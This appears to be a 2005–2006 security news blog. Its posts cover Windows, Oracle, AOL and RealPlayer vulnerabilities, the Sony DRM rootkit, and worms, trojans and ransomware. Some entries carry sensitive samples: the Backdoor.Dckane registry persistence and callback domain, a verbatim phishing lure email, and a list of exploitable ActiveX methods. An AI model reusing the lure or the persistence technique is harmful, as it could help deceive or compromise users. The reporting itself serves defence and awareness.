According to F-Secure's Hypponen, attackers are exploiting a widely reported flaw in the way the Windows operating system renders images that use the WMF (Windows Metafile) graphics format. This flaw was patched on Jan. 5, so users who are running versions of Windows that have the latest patches installed are not at risk.
Because of the nature of the WMF vulnerability, however, hackers could install any type of software they wanted on unpatched systems.
How the attackers were able to compromise the AMD forums is unclear. Hypponen said that the AMD server could have been hacked, but that the problem could also be due to an intrusion at an AMD partner Web site or at an ISP.
These kind of WMF exploits have already been seen on a number of Web sites, but AMD is the most high-profile victim. Because users tend to trust content being served by known Web sites like AMD, the hack is particularly troublesome.

Sunday, January 22, 2006


Today a most interesting exploit came to my attention with the unknown service DFind exe in task manager. I admit it did hide pretty well from me for awhile at anyrate. Hidding this inside the hidden folder system volume information was a interesting little twist. After killing the service and deleting it was pretty easy to remove however.

Saturday, January 21, 2006
A new version of the popular Skype VOIP application has been released to correct a bug that caused Skype to be misread as a potential security threat.
The Skype 2.0.0.73 for Windows update fixes a flaw that triggered a DEP (Data Execution Protection) warning on systems running Windows XP SP2 with DEP-enabled Intel or AMD processors.
DEP is a set of hardware and software technologies that perform additional checks on memory to help prevent buffer overflow attacks.
The Skype bug meant that users running new computers had to manually configure the application as an exception to turn off the DEP warnings.
This, however, created a scenario where users were being lulled into ignoring DEP warnings because of the Skype bug.
"If you added Skype to some DEP exception list before this release, feel free to upgrade to 2.0.0.73 and then remove it from the exceptions list," the company said.

Wednesday, January 18, 2006
Oracle Corp. released patches addressing more than 100 separate vulnerabilities in its database and application server software, as well as in its collaboration and e-business suites.
The patches, which are part of Oracle’s scheduled quarterly updates, included fixes for flaws in its PeopleSoft and J.D. Edwards portfolios.
A large number of the flaws affecting Oracle’s databases were listed as having a “wide” impact on database availability, integrity and confidentiality.
For instance, one of the them is a vulnerability in Oracle databases that enables any user with basic access privileges to assume the role of a database administrator. The flaw, first reported to Oracle in October by database security firm Imperva Inc., also allows would-be attackers to prevent illegal activity from being recorded by the database server’s built-in auditing mechanism, said Shlomo Kramer, Imperva’s CEO.
This is the second batch of patches to be released by Oracle since the company moved to a quarterly schedule last fall. Oracle’s next patch update is slated for April 12.
Under its Critical Patch Update program, Oracle has said that it will release highly integrated patches that combine fixes for multiple high-priority vulnerabilities. The patches are cumulative, meaning users who miss applying patches one quarter can apply a cumulative update the following quarter that addresses both the previous problems and any new ones that might have cropped up.
Oracle has made a great deal of improvement over the past year in [its] security response processes, but there is still a long way to go.

Updated: America Online posts a hotfix to correct a buffer overflow vulnerability in its "You've Got Pictures" photo album service.
A critical security flaw in America Online Inc.'s "You've Got Pictures" service could put millions of users at risk of PC takeover attacks, according to a warning from the US-CERT (U.S. Computer Emergency Readiness Team).
In an advisory, US-CERT described the flaw as a buffer overflow in an AOL YPG Picture Finder Tool ActiveX control (YGPPicFinder.DLL) that may be exploited to execute arbitrary code or cause a denial-of-service condition.
The vulnerability affects AOL 8.0, AOL 8.0 Plus and AOL 9.0 Classic. In addition, the vulnerable control was distributed via the "You've Got Pictures" Web site prior to 2004.
A separate alert from FrSIRT (French Security Incident Response Team), rates the bug as "critical" and warned that the vulnerable ActiveX control does not properly handle overly long input strings.
"[This] could be exploited by remote attackers to compromise a vulnerable system by convincing a user to visit a specially crafted Web page."

Sunday, January 15, 2006
ESET, a personal favorite provider of security software for enterprises and consumers, announced that its NOD32 solution with ThreatSense(R) technology has been enhanced to protect users and organizations against stealth rootkit applications. Rootkits, which by design are highly undetectable, are widely known to escape discovery by traditional signature-based antivirus methods.
Rootkits recently came to public attention when it was discovered that Sony included a rootkit on some of its music Cds and video DVDs in an effort to prevent illegal copying and distribution of copyrighted material. Designed specifically to be "invisible" to users, rootkits can be used to hide malicious software, giving criminals the opportunity to exploit unprotected computers.
"Rootkit detection is based on the new generation of intelligent signatures, which is a part of the ThreatSense technology," says Richard Marko, chief software engineer for ESET. "Currently, ESET is the only integrated threat protection system known to proactively detect even unknown rootkits."
ESET's NOD32 ThreatSense(R) technology is a sophisticated detection system based on advanced heuristics that proactively identifies previously unknown malware, such as that which exploited the Sony rootkit.
Rootkit protection is available immediately to current NOD32 license holders, and will be automatically installed to computers configured to receive automatic program component updates. To download a free trial copy of NOD32, please visit www.eset.com.

Wednesday, January 11, 2006
Responding to the rising cybercrime threat, the Federal Trade Commission on Tuesday unveiled an online tool designed to help consumers avoid becoming victims of Internet scams.
At the website, www.onguardonline.gov, consumers can take interactive quizzes designed to enlighten them about ID theft, phishing, spam and online-shopping scams.
If the user selects a wrong answer, the program explains why that particular misconception about Internet security can lead to trouble.
Elsewhere on the site, consumers can find detailed guidance on how to monitor their credit histories, use effective passwords and recover from identity theft.
"We're trying to make the information as accessible as possible, with tips so people can take action," said Nat Wood, the FTC's assistant director for consumer and business education.
The education push comes as the tide of cybercrime continues to rise. Special reports by USA TODAY have detailed how online thieves are sidestepping computer firewalls, anti-virus and anti-spyware programs to conduct elaborate scams centered around use of the Internet.
Inherently difficult to track, evidence of cybercrime nonetheless continues to mount:
•Malicious software. During the first half of 2005, 74% of the top 50 malicious attacks contained code to steal account logons, passwords and other sensitive data, compared with 54% the previous six months, according to security firm Symantec.
•Keystroke loggers. The number of programs designed to directly swipe logons and passwords, as a computer user types them on a keyboard, soared to about 6,191 last year, up from 3,753 in 2004, says iDefense, a division of VeriSign.
•Hijacked online accounts. Computers in an estimated 9.9 million U.S. households that engage in online banking transactions have been infected by keystroke loggers, giving cybercrooks potential access to an estimated $24 billion in deposits, says the tech security think tank The Sans Institute.

1.11.2006 Microsoft Corp. released two patches Tuesday that carry its maximum rating of critical, to fix software problems that could allow an attacker to take control of another person's computer.
Microsoft said one patch is to fix a flaw in Windows desktop and server software that could let an attacker gain control of an Internet-connected computer if a user were tricked into visiting a malicious Web site. The fix is for operating systems dating back to Windows 2000.
The other patch is to fix a flaw in the part of Microsoft's Office business software and Exchange Server software that lets users change and manage language preferences. The fix is for versions of the software dating back to Office 2000.
The patches, released Tuesday as part of Microsoft's regular monthly security update, follow the release last week of another critical fix for a flaw in an element of Windows that is used to view images.

Wednesday, January 04, 2006

Microsoft Corp. has slapped a 'buyer beware' tag on a third-party patch for the zero-day Windows Metafile flaw and promised that its own properly tested update will almost certainly ship Jan. 10.
The company's latest guidance comes days after an unofficial hotfix from reverse-engineering guru Ilfak Guilfanov got rare blessings from experts at the SANS ISC (Internet Storm Center) and anti-virus vendor F-Secure Corp.
Guilfanov, author of the IDA (Interactive Disassembler Pro), released an executable that revokes the "SETABORT" escape sequence that is the crux of the problem. The hotfix was tested and approved for use by many security experts, but Microsoft says it cannot vouch for the quality of the fix.
"Microsoft recommends that customers download and deploy the security update for the WMF vulnerability that we are targeting for release on January 10, 2006," the company said in an updated advisory.
Microsoft said its own patch has already been developed and is going through a rigid round of quality assurance testing. "The security update is now being localized and tested to ensure quality and application compatibility." Last-minute glitches in the patch testing process could still delay the update.
As a general rule, the Redmond, Wash., company never recommends third-party updates. Ever since attackers started exploiting the bug to push malware on vulnerable Windows systems (XP SP2 included), the company has thrown all its security resources into the investigation and patch-creation process, making it virtually impossible to validate the third-party code.

Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution.
Published: December 28, 2005 | Updated: January 3, 2006
On Tuesday, December 27, 2005, Microsoft became aware of public reports of malicious attacks on some customers involving a previously unknown security vulnerability in the Windows Meta File (WMF) code area in the Windows platform.
Upon learning of the attacks, Microsoft mobilized under its Software Security Incident Response Process (SSIRP) to analyze the attack, assess its scope, define an engineering plan, and determine the appropriate guidance for customers, as well as to engage with anti-virus partners and law enforcement.
Microsoft confirmed the technical details of the attack on December 28, 2005 and immediately began developing a security update for the WMF vulnerability on an expedited track.
Microsoft has completed development of the security update for the vulnerability. The security update is now being localized and tested to ensure quality and application compatibility. Microsoft’s goal is to release the update on Tuesday, January 10, 2006, as part of its monthly release of security bulletins. This release is predicated on successful completion of quality testing.
The update will be released worldwide simultaneously in 23 languages for all affected versions of Windows once it passes a series of rigorous testing procedures. It will be available on Microsoft’s Download Center, as well as through Microsoft Update and Windows Update. Customers who use Windows’ Automatic Updates feature will be delivered the fix automatically.
Based on strong customer feedback, all Microsoft’s security updates must pass a series of quality tests, including testing by third parties, to assure customers that they can be deployed effectively in all languages and for all versions of the Windows platform with minimum down time.
Microsoft has been carefully monitoring the attempted exploitation of the WMF vulnerability since it became public last week, through its own forensic capabilities and through partnerships within the industry and law enforcement. Although the issue is serious and malicious attacks are being attempted, Microsoft’s intelligence sources indicate that the attacks are limited in scope and are not widespread.
In addition, anti-virus companies indicate that attacks based on exploiting the WMF vulnerability are being effectively mitigated through up-to-date signatures.
Customers are encouraged to keep their anti-virus software up-to-date. The Microsoft Windows AntiSpyware (Beta) can also help protect your system from spyware and other potentially unwanted software. Customers can also visit Windows Live Safety Center and are encouraged to use the Complete Scan option to check for and remove malicious software that takes advantage of this vulnerability. We will continue to investigate these public reports.
If you are a Windows OneCare user and your current status is green, you are already protected from known malware that uses this vulnerability to attempt to attack systems.
Customers who follow safe browsing best practices are not likely to be compromised by any exploitation of the WMF vulnerability. Users should take care not to visit unfamiliar or un-trusted Web sites that could potentially host the malicious code.

Thursday, December 29, 2005

| Backdoor.Dckane is a back door program that allows a remote attacker to have unauthorized access to the compromised computer.
When Backdoor.Dckane is executed, it performs the following actions:
- Creates the following files:
%Windir%\kane.exe %System%\kane.dll Note:
- %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
- %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows (Windows 95/98/Me/XP) or C:\Winnt (Windows NT/2000).
- Modifies the values:
"Shell" = "Explorer.exe kane.exe" in the registry subkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon so that it runs every time Windows starts.
- Attempts to inject itself into Explorer.exe.
- Opens a back door on the compromised computer by connecting to the kane.oicp.net domain.
- Listens and awaits commands from a remote attacker.
|

Linux.Mare is a worm that spreads by exploiting the PHP-Nuke "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm, which has back door capabilities, also downloads and executes remote files on the compromised computer.
|

Monday, December 26, 2005
The Troj/Stinx-E Trojan horse appears to have been deliberately spammed out to email addresses, posing as a message from a British business magazine.
It exploits the controversial Sony DRM (Digital Rights Management) copy protection included on some of the music giant's CDs.
Typical emails look as follows:
Subject: Photo Approval Deadline
Message body:
Hello,
Your photograph was forwarded to us as part of an article we are publishing for our December edition of Total Business Monthly. Can you check over the format and get back to us with your approval or any changes? If the picture is not to your liking then please send a preferred one. We have attached the photo with the article here.
If the attached program is run, the Trojan horse copies itself to a file called $sys$drv.exe. Any file with $sys$ in its name is automatically cloaked by Sony's copy-protection code, making it invisible on computers which have used CDs carrying Sony's copy protection.
"Despite its good intentions in stopping music piracy, Sony's DRM copy protection has opened up a vulnerability which hackers and virus writers are now exploiting," said Graham Cluley, senior technology consultant for Sophos. "We wouldn't be surprised if more malware authors try and take advantage of this security hole, and consumers and businesses alike would be sensible to protect themselves at the earliest opportunity."
Sophos plans to issue a tool later today which will detect the existence of Sony's DRM copy-protection on Windows computers, disable it, and prevent it from re-installing.
"Sophos is acting on customers' concern that the software on Sony's CDs is introducing a vulnerability which hackers and virus writers are able to exploit," explained Cluley. "We will give customers the ability to determine if their computers suffer from the vulnerability and remove it if necessary."

Wednesday, December 14, 2005

Microsoft this week fixed a widely reported flaw in its Internet Explorer (IE) browser that had been used by attackers over the past few weeks to take over the PCs of unsuspecting users. The flaw was one of four IE bugs fixed Tuesday in Microsoft's regularly scheduled software update.
Although attacks based on the vulnerability have not been widespread, it is important that IE users now install the patch. "But isolated attackers here and there have used it to install malware."
Microsoft fixed this problem, along with the other three IE bugs, in one of two security updates, released Tuesday. More details on the IE fixes can be found in the MS05-054 Security Bulletin here. This update is rated "critical" by Microsoft.
A second update, assigned Microsoft's less severe security rating of "important," fixes a problem in the Windows 2000 kernel. That update can be found here. This bug could help an attacker to circumvent Microsoft's user privileges mechanism and perform unauthorized tasks on a PC.
Typically, this flaw could not be exploited remotely, as it requires that the attacker gain access to the targeted computer's keyboard, said Steve Manzuik, security product manager with the company that discovered the bug, eEye Digital Security. Its advisory may be read here.

Tuesday, December 13, 2005
A new flavor of Sober set for Jan 5 2006
Time is short and people maintain a level of ignorance and simple stupidity that is outstanding.
Warnings are everywhere: USA Today! Yahoo News!
A recent report by America Online and the National Cyber Security Alliance found that up to 81% of respondents had no security controls. Of that number, 56% did not have any antivirus software or had software that had not been updated in the past week, and 44% had an improperly configured firewall. As for spyware, 38% said they had no antispyware protection at all.
What began as a relatively unsophisticated worm, has now become a leading threat with modifications by the author. One e-mail gateway has logged millions of interceptions of Sober on a daily basis, racking up 94 million during the big outbreak in November.
Security experts also said the worm appears to be timed to coincide with a major German political convention the next day to increase the worm's notoriety and to help spread it.

Thursday, December 08, 2005
Is the web unistall of Sony DRM leaving the system more open due to the Active X object needed to get it removed? Honestly I cannot understand how a company can do this without legal people doing something.
Matti Nikki of Finland was the first to figure out just what the uninstaller was doing. It seems the uninstaller puts an ActiveX control called CodeSupport on the target machine even before the uninstall URL can be obtained.
The control is marked "safe for scripting" and remains this way on the machine even after the uninstall process is concluded.
What this means is that any remote user can use the methods of this control to do anything. Here's the list of methods that Muzzy found:
GenerateRequestPacket
ExecuteCode (can crash browser)
Uninstall
RebootMachine (exploitable; Muzzy has a demo that may make the
situation worse)
GetProgress
OnLoaded
InitializeDiscScan
GetNumberOfDiscs
IsDRMServerValid
GetAlbumArtist
GetAlbumName
GetMaxBurnCount
GetCurrentBurnCount
GenerateIncrementPacket
IsContentOwnerValid
DoIncrement
GetInstalledSoftwareVersion
IsXCPDiscPresent
InstallUpdate (possibly exploitable, downloads given a URL)
GetInstallProgress
GetCompletionStatus
IsXCPDiscPresentAsLong
IsAdministrator
It was at this point that Ed Felten and Alex Halderman of Princeton got involved on their Freedom to Tinker Weblog. They realized that the CodeSupport control would allow any Web page to download, install and run any code it wants to on your computer, since Code Support doesn't verify that it is only working with the uninstaller code it was supposed to deal with.
Halderman and Felten have written exploits (that they are not making public) to verify that this can occur. While Sony has replaced the Web-based installer with a downloadable .exe file, it remains unclear at this point (given the company's track record) whether the new installer is safe to use.
There is a simple way suggested by Halderman and Felten to remove the CodeSupport component from Windows if you have been affected.
From the Start Menu, choose Run, and then type the following (between the brackets without typing the brackets) into the box that appears.
[cmd /k del "%windir%\downloaded program files\codesupport.*"]
That should delete all files associated with control. Please understand that you do this at your own risk, since your security settings may not prevent the software from being installed again.

The sharp rise in rootkit detections on Windows machines is a direct result of adware/spyware vendors using sophisticated techniques to hide processes and prevent uninstall, according to anti-virus vendor F-Secure Corp.
F-Secure the Finnish company, which ships an anti-rootkit scanner in its security suite, has identified ContextPlus, Inc., makers of the Apropos and PeopleOnPage adware programs, as the company responsible for a large number of stealth rootkit infections.
F-Secure chief incident officer Mikko Hypponen said the company's BlackLight technology has discovered the use of "very advanced rootkit technologies" in Apropos, a spyware program that collects users' browsing habits and system information and reports back to the ContextPlus servers.
Like the typical spyware application, Apropos uses the data to serve targeted pop-up advertisements while the user is surfing the Web. Unlike the average worm or bot that use rootkit technologies to avoid detection, Hypponen said the rootkit features built into Apropos aren't being used to hide the existence of the program on the machine.
They're using a very sophisticated kernel-mode rootkit that allows the program to hide files, directories, registry keys and processes. The rootkit fitted into Apropos is implemented by a kernel-mode driver that starts automatically early in the boot process. When the files and registry keys have been hidden, no user-mode process is allowed to access them.

A new malicious worm squirming through America Online Inc.'s AIM network has the ability to carry on an instant messaging conversation with potential victims.
Researchers at IMLogic Inc.'s Threat Center spotted the new threat and warned that virus writers are continuing to push the social engineering envelope to trick computer users into downloading nasty malware programs.
The newest worm, identified as IM.Myspace04.AIM, is coded to chat and persuade the victim to click on a malicious URL embedded in the IM message. If the first attempt at infection is unsuccessful and the victim replies to doubt the legitimacy of the link being sent, the worm replies with the following message: "lol no its not its a virus."
Like other IM worms spreading over AOL's instant messaging network, the bot uses an infected user's buddy list to propagate itself, carrying on a conversation with new victims without the infected user's knowledge.
"This sophisticated bot attack is programmed such that infected users cannot see the messages the worm is sending on their behalf. When recipients of the malicious message reply to the infected user, the bot running on the infected machine sends follow-up messages," IMlogic said in an advisory.

Wednesday, December 07, 2005
On 12-4-2005 I reported this flaw in IE and it seems that Google has adjusted their code to adjust for the IE Flaw.
Google Inc. has made an "adjustment" to its Google Desktop application to protect users from an unpatched design flaw in Microsoft Corp.'s Internet Explorer browser. "We have made an adjustment to the product to help protect users," said Google spokesperson Sonya Boralv. She declined to provide details on the extent of the Google Desktop modifications.
Boralv said users aren't required to take any action to get protected because the changes were made "on our end" to block the remote access attack vector.

Sunday, December 04, 2005

A bug in Microsoft Corp.'s Internet Explorer Web browser gives phishers a way to scan the hard drives of Google Desktop users, according to an Israeli hacker. Because of a flaw in the way Internet Explorer processes Web pages, a malicious Web site could use the attack to steal sensitive information such as credit card numbers or passwords from the hard drives of its visitors.
"Google Desktop users who use IE are currently completely exposed," hacker Matan Gillon said via e-mail. "An experienced attacker can covertly harvest their hard drives for sensitive information such as passwords and credit card numbers. Since Google also indexes e-mails which can be read in the Web interface itself, it's also possible to access them using this attack." Full Article

Tuesday, November 29, 2005

Recently my own anti-virus software attacked an removed a .dll within the installed path of QuickTime Player. This caused me a good deal of concern. I assumed at first that the anti-virus software was being over zealous. Today I was trying to remove the QuickTime Player and thought I would simply uninstall and reinstall a new version. This is where we all start laughing out loud.
Well no big deal I thought, just go trash all the keys. I had no idea just how many keys were assoicated to this software. Go Apple! So after about an half hour of trashing the keys I decided I would look into the problem before I reinstall. I was abit taken in by the topic I was exploring here. Seems when it comes to Apple everyone acts like no negative comments can be made. Personally I have the solution to this problem. Remove it untill apple decides to get it right. I am quickly reminded of the Sony Deal. Are companies actually no longer responsible for setting people up to Remote Code Execution?
eEye Security has posted these short bits on their site. EEYEB-20051031 | EEYEB-20051117a | EEYEB-20051117b
Researchers at eEye Digital Security have taken a bite out of two popular Apple Computer Inc. products, flagging two critical vulnerabilities in the iTunes and QuickTime applications.
The flaws, which put millions of Windows users at risk of code execution attacks, remain unpatched.
Steve Manzuik, security product manager on eEye's research team, said the newest version of iTunes, which was released by Apple earlier this month, contains the vulnerability.
eEye, of Aliso Viejo, Calif., has posted two brief notices on its Web page for upcoming advisories warning that the flaws carry a "high risk" label. "Full Article"

Tuesday, November 22, 2005
Search engine darling Google Inc. has issued a patch to cover a range of potentially dangerous security flaws in the enterprise-facing Google Mini search appliance.
The company's patch was issued after researchers at the Metasploit Project pinpointed several bugs that can be exploited by malicious hackers to conduct cross-site scripting, file discovery and service enumeration attackers.
Metasploit creator H.D. Moore warned in an advisory that the most serious bug can lead to arbitrary command execution.
Security alerts aggregator Secunia Inc. rates the flaws as "highly critical."
According to Moore, Google's patch and advisory were only released to businesses that pay about $3,000 for the pizza box-sized appliance.
A spokesperson for Google said the company learned of the issue several months ago and quickly made a patch available to all enterprise customers. "No customers have reported any effect related to this issue," he added.
Metasploit's Moore said the flaw was discovered in a feature that allows customization of the Google Mini's search interface through XSLT (Extensible Stylesheet Language Transformations) style sheets. He explained that certain versions of the appliance allow a remote URL to be supplied as the path to the XSLT style sheet, and warned that the feature can be abused to perform malicious hacking attacks.

The computer security research organization's report reveals that cyber criminals have shifted targets. Over the past five years, most hackers went after operating systems and Internet services like Web servers and E-mail servers. In 2005, they took aim at software applications.
The applications under fire span a variety of operating systems. They include enterprise backup software, anti-virus software, PHP applications, database software, peer-to-peer file sharing software, DNS software, media player software, IM software, and Internet browsers.
The second major finding of the report is that vulnerabilities in network operating systems such Cisco’s Internetwork Operating System (IOS), which powers most of the routers and switches on the Internet, represent a significant threat.
"The bottom line is that security has been set back nearly six years in the past 18 months," Alan Paller, director of research for the SANS Institute, wrote in an E-mail. "Six years ago, attackers targeted operating systems and the operating system vendors didn't do automated patching. In the intervening years, automated patching protected everyone from government to grandma. Now the attackers are targeting popular applications, and the vendors of those applications do not do automated patching."
Security experts credit Microsoft's efforts to improve its software with forcing hackers to look for lower hanging fruit. Part of the reason we're seeing a more of the attacks go against things other than the Windows operating system is that the Windows operating system has gotten better.
Full Article

Friday, November 18, 2005

Trust SONY ?
On Oct. 31, Mark Russinovich broke the story in his blog: Sony BMG Music Entertainment distributed a copy-protection scheme with music CDs that secretly installed a rootkit on computers. This software tool is run without your knowledge or consent -- if it's loaded on your computer with a CD, a hacker can gain and maintain access to your system and you wouldn't know it.
The Sony code modifies Windows so you can't tell it's there, a process called "cloaking" in the hacker world. It acts as spyware, surreptitiously sending information about you to Sony. And it can't be removed; trying to get rid of it damages Windows.
This story was picked up by other blogs (including mine), followed by the computer press. Finally, the mainstream media took it up.
The outcry was so great that on Nov. 11, Sony announced it was temporarily halting production of that copy-protection scheme. That still wasn't enough -- on Nov. 14 the company announced it was pulling copy-protected CDs from store shelves and offered to replace customers' infected CDs for free.
Full story here.

Friday, November 11, 2005

Digital media delivery firm RealNetworks Inc. late Thursday shipped a major security update for its RealPlayer software to patch a pair of remote code execution vulnerabilities.
The security holes, which were reported to RealNetworks more than four months ago, could be exploited by malicious hackers to take complete control over a vulnerable machine.
According to eEye Digital Security, the company that discovered the bugs, the most serious flaw exists in the first data packet contained in a Real Media file.
By specially crafting a malformed ".rm" movie file, a direct stack overwrite is triggered, and reliable code execution is possible.
Affected software include RealPlayer 8, RealPlayer 10, RealOne Player v1, RealOne Player v2, RealPlayer Enterprise (Windows): RealPlayer 10 (Mac); RealPlayer 10 and Helix Player (Linux).

Thursday, November 03, 2005

Two new versions of a virus first reported in May are staging renewed attacks against computers in Russia, encrypting files and then extorting money from victims to decode the files.
After an infection, the Russian-language instructions let victims know how many of their files have been encrypted. Translated, the warning says, "If you want to get these damn files in the decrypted format" then write to the e-mail address given. The message goes on to say, "P.S. And be thankful that they were not completely erased!"
The viruses, called JuNy.A and JuNy.B, search for more than 100 file types by extension, according to a warning issued by Websense Inc. The renewed attack was first reported on a weblog published by Kaspersky Lab Ltd.
It's suspected that the virus enters a computer after a user visits a certain Web site and then exploits a vulnerability. Another theory is the virus is activated after a user runs some type of executable code containing the virus. In the last couple of years, however, virus writers have moved away from writing malicious code simply to display their skills and are increasingly trying to make money.
Trend offers some removal information. Troj_Juny.A Troj_Juny.B

Monday, October 31, 2005
Timing their effort to coincide with national Cyber Security Awareness Month and Halloween, the U.S. Federal Trade Commission (FTC), Consumer Action and Microsoft are urging consumers to protect themselves from the threat of zombies, computers that are infected with malicious code so they can be controlled remotely by other people for illegal purposes.
"The only way to slow the spread of zombies and other online threats is by going after them as resolutely and in as many ways as possible," says Tim Cranton, director of Microsoft's Internet Safety Enforcement programs.
Microsoft maintains more than 130,000 MSN Hotmail "trap" accounts to investigate patterns within spam. These accounts catch e-mail sent by spammers to potential e-mail addresses. But, as all spam investigators quickly learn, investigating spam after it's delivered is like tracing an unwanted letter with an illegible (or fake) return address. Most spammers protect their identities by sending mail through zombies or using other masquerading tricks, making it fruitless to trace spammers based on the name listed in the "From" line in the e-mail's header.
But Microsoft's zombie investigation gave the company new insight into how it, as a technology developer and e-mail provider, can fight spam and zombies, as well as how to fight the creators of zombies in court.
"By inserting ourselves in the spammers' path and looking upstream, we have been able to see things we have never been able to see before," Cranton says.
Specifically, Microsoft was able to uncover the IP addresses of the computers that were sending spamming requests to the quarantined zombie, along with the addresses of the Web sites advertised in the spam.
To prove these spamming requests were not isolated examples, Microsoft compared the Web sites advertised in the quarantined zombie's spam to those listed in spam in the MSN Hotmail trap accounts.
Cranton says the researchers found numerous identical matches, and were able to determine that approximately 13 distinct spamming operations either helped create or exploit the zombie code placed on the quarantined computer.
These spammers, who are currently unidentified, are named as "John Doe" defendants in the civil lawsuit Microsoft filed in state court in King County, Wash., on Aug. 17. Filing a "John Doe" lawsuit allows Microsoft to use legal discovery tools – such as third-party subpoenas – to help learn the defendants' true identities.

Sunday, October 30, 2005

A rootkit being spread through AOL's popular instant messaging client and AOL chat rooms.
Bundled within the previously identified W32/Sdbot-ADD worm, the lockx.exe rootkit file is installed when users click on the file link within the IM window. Though neither the worm nor the rootkit file are new, it appears to be the worm's first foray into the AIM (AOL's Instant Messenger) network. What's more troubling is that rootkits haven't previously been spread via IM.
Attackers can automatically pass the worm along to users on the Buddy List. Additionally, the rootkit can shut down anti-virus software, alter the users' search page, run CPU usage to 100 percent and automatically download unwanted programs such as 180Solutions, Zango, MaxSearch and others.

Wednesday, October 26, 2005
The Measurement Factory has conducted two surveys of Internet-connected domain name servers (DNS) on behalf of Infoblox. The surveys consisted of several queries directed at each of a large set of external DNS servers to estimate the number of systems deployed today and determine specific configuration details.
The survey results revealed that many organizations often disregard these critical systems, which perform the functions necessary to make their presence available and accessible on the Internet. The Internet Systems Consortium's BIND software, which performs the domain name resolution function, is often out of date, opening the door to malicious attacks. And, the systems are sometimes mis-configured, potentially compromising network availability.
Following is a summary of the significant survey results:
There are an estimated 7.5 million external DNS servers on the public Internet
Over 75% domain name servers (of roughly 1.3 million sampled) allow recursive name service to arbitrary queriers. This opens a name server to both cache poisoning and denial of service attacks.
Over 40% allow zone transfers from arbitrary queriers. This exposes a name server to denial of service attacks and gives attackers information about internal networks.
In almost 33% of the cases, all authoritative name servers for a zone were on the /24 same subnetwork. This leaves network open to accidental and deliberate denial of service attacks.
Only 60% of the name server records delegating each zone matched the intrazone name server records . Mis-matched records may decrease the number of servers available for resolution, reduce redundancy, increase load, and leave a zone susceptible to denial of service attacks.
57% run the most recent, secure versions of BIND (9.x):
| BIND 9.3, 9.2, 9.1 |
57% |
| BIND 8.3, 8.2, 8.1 |
20% |
| Windows 2000 |
6.5% |
| Windows 2003 |
3.5% |
| Other |
13% |
For more information, a press release and reports including methodology, complete results and all findings are available.
Press release Report: June 2005 Report: April 2005

Saturday, October 08, 2005
Last month, Microsoft issued no new security bulletins as part of its monthly update.
This month, though, the tune has changed, as nine patches are on tap, some of them rated as "critical." According to reports, Windows XP itself may also be getting a Service Pack 3 release in 2006.
True to form, Microsoft is vague in its advance bulletins about patches and has not disclosed the specific issues that will be addressed. Eight of the issues set to be patched will involve Windows, and there's one that specifically affects Microsoft Exchange.
Internet Explorer is among the Windows applications that are likely to be patched. Security firm Secunia reports that there are numerous unpatched vulnerabilities in IE. Among them is the "XMLHTTP" HTTP Request Injection vulnerability which "can be exploited by malicious people to manipulate certain data and conduct HTTP request smuggling attacks."

Thursday, October 06, 2005

An Internet security specialist says a new threat forces computers to install faked Google software, which then goes phishing. Phishing is where e-mails, IM (instant messages) or Web sites parody a legitimate company, and try to get users to provide personal information or financial account numbers and passwords.
The latest cases involve bogus Google software spread via IM, and appear to be a variety of the infamous CoolWebSearch phishing scheme, according to Foster City-Calif.-based FaceTime Security Labs. CoolWebSearch has never been spread via IM before.
In the recent cases, IM users unwittingly download a rogue tool bar, which is installed on a Web browser and provides easier access to an Internet search provider.
The only working feature on the fake Google Toolbar saves credit card details, according to Christopher Boyd, the security research manager of Foster City, Calif.-based FaceTime Security Labs. A bevy of others, including one to "enable pornographic ads," do not work.
IM is increasingly a target of phishers, as the latest attacks show. "Full Article"

Monday, October 03, 2005
Can't we all just get along? With all the data from a recent Bagle outbreak, and most of the identifications are just Bagle, but they're almost all different specific variants. The confusion this causes, and specifically look at the three big anti-virus companies: McAfee, Symantec and Trend Micro use names bearing no resemblance to each other.
In the heat of a malware outbreak there is usually a lot of confusion about what variant of what worm is involved? Is it just a new variant or a completely new worm? Inconsistencies between vendors about variant indices and virus names add to the confusion.
Larry Seltzer wrote a couple articles on the topic and I am in total agreement. One can only guess at how confused a novice home user is by all the naming issues.
| Finnish anti-virus specialist F-Secure has dived headfirst into the crowded anti-spyware market, rolling out a new consumer-facing security suite that promises to detect unwanted programs before a PC becomes injected. |
 |
| F-Secure Corp.'s new F-Secure Internet Security 2006 offers technology to tackle the problem of inadvertently installed spyware and adware programs that sneak onto computers via file-sharing networks.
F-Secure is also the first vendor to ship rootkit detection technology into a consumer product offering, giving the company an early entry into a potentially lucrative market.
A rootkit is described as a malicious program that uses system hooks to conceal its presence on the system.
For instance, it monitors if the user opens the Windows Task Manager in order to keep itself out of the list of processes.
Security researchers have discovered evidence of malware writers using stealth rootkit features to hide spyware and other malicious programs on Windows machines. "Learn more" |

Monday, September 26, 2005

The recent increase of Bagle variants are being spammed out in large quantities through a distributed network of compromised machines, called botnets. Some of the variants are older versions of the Bagle virus, repacked to avoid detection. The new Bagles are Trojan downloaders, which retrieve and install malicious files from a pre-programmed Web site location and create a backdoor on a machine. This distribution mechanism causes variants to spread outside of the spam channels and leaves unprotected users or systems with outdated virus signatures vulnerable to attack.
ESET is providing a free remover for the most prevalent variants of the Bagle worms, which can be downloaded at www.eset.com.
ESET's Virus Radar (www.virusradar.com), a real-time malware tracking tool, identified the new Bagle variants using NOD32. Virus Radar provides site visitors with easy access to in-depth analysis of the latest malicious outbreaks and processes approximately four million email messages per day to provide information such as the exact date a virus was first detected and its current detection rate. Virus Radar is also capable of tracking the progression of a single virus over a given period -- in some instances from the earliest heuristic detection of a new virus to the point where the virus disappears.

Wednesday, September 21, 2005

Security researchers at Panda Software say they have discovered a new worm that generates a spoofed version of Google, the Web's most popular search engine.
The company's PandaLabs unit reported late Friday that it had identified a worm it has labeled as P2Load.A that creates a fake Google site, and launches adware on infected computers.
The security software maker, which is based in Bilbao, Spain, said that the attack spreads via peer-to-peer, or P2P, computer networks, specifically the Shareaza and Imesh programs.
Panda said that the P2Load.A threat copies itself onto the shared directory of the P2P software as an executable file named after a Star Wars-themed video game, Knights of the Old Republic 2, and lures end users into launching the virus on their machines using a faked error message. Once the virus has been sprung, it immediately modifies the computer's start page, launches the adware and spoofs Google.
